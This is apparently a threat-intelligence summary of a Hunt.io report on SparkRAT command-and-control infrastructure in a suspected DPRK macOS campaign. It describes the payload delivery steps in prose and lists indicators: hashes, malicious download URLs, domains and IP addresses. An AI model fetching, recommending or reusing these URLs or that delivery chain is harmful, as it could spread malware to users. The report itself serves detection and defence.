2025-01-28 • Hunt.io •
https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections
Hunt.io identifies additional SparkRAT infrastructure tied to a suspected DPRK macOS campaign previously observed using fake meeting-themed lures. The activity includes open directories serving bash scripts and Mach-O SparkRAT clients, with delivery paths that download client.bin, save it under /Users/shared, set broad execute permissions, and run it in the background. SparkRAT communications rely on WebSocket and HTTP behavior, including default port 8000 panels, Basic Authentication prompts, and update-check responses that can help defenders fingerprint active C2 servers. The investigation lists infrastructure in South Korea and Singapore, including UCLOUD and OVH-hosted IPs, Namecheap-registered domains, Let's Encrypt certificates, and a related Vietnamese-language gaming-themed site used around the same C2 ecosystem.
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | ffe4cfde23a1ef557f7dc56f53b3713… | 2025-01-28 | 2025-01-28 |
| HASH | cd313c9b706c2ba9f50d338305c456a… | 2025-01-28 | 2025-01-28 |
| HASH | 52277d43d2f5e8fa8c856e1c098a1ff… | 2025-01-28 | 2025-01-28 |
| URL | http://one68.top/client | 2025-01-28 | 2025-01-28 |
| URL | http://updatetiker.site/dev/cli… | 2025-01-28 | 2025-01-28 |
| DOMAIN | henho247.net | 2025-01-28 | 2025-01-28 |
| DOMAIN | one68.top | 2025-01-28 | 2025-01-28 |
| DOMAIN | remote.henh247.net | 2025-01-28 | 2025-01-28 |
| DOMAIN | updatetiker.site | 2025-01-28 | 2025-01-28 |
| DOMAIN | updatetiker.net | 2025-01-28 | 2025-01-28 |
| DOMAIN | remote.henho247.net | 2025-01-28 | 2025-01-28 |
| IPv4 | 118.194.249.38 | 2025-01-28 | 2025-01-28 |
| IPv4 | 152.32.138.108 | 2025-01-28 | 2025-01-28 |
| IPv4 | 15.235.130.160 | 2025-01-28 | 2025-01-28 |
| IPv4 | 15.32.138.108 | 2025-01-28 | 2025-01-28 |
| IPv4 | 51.79.218.159 | 2025-01-28 | 2025-01-28 |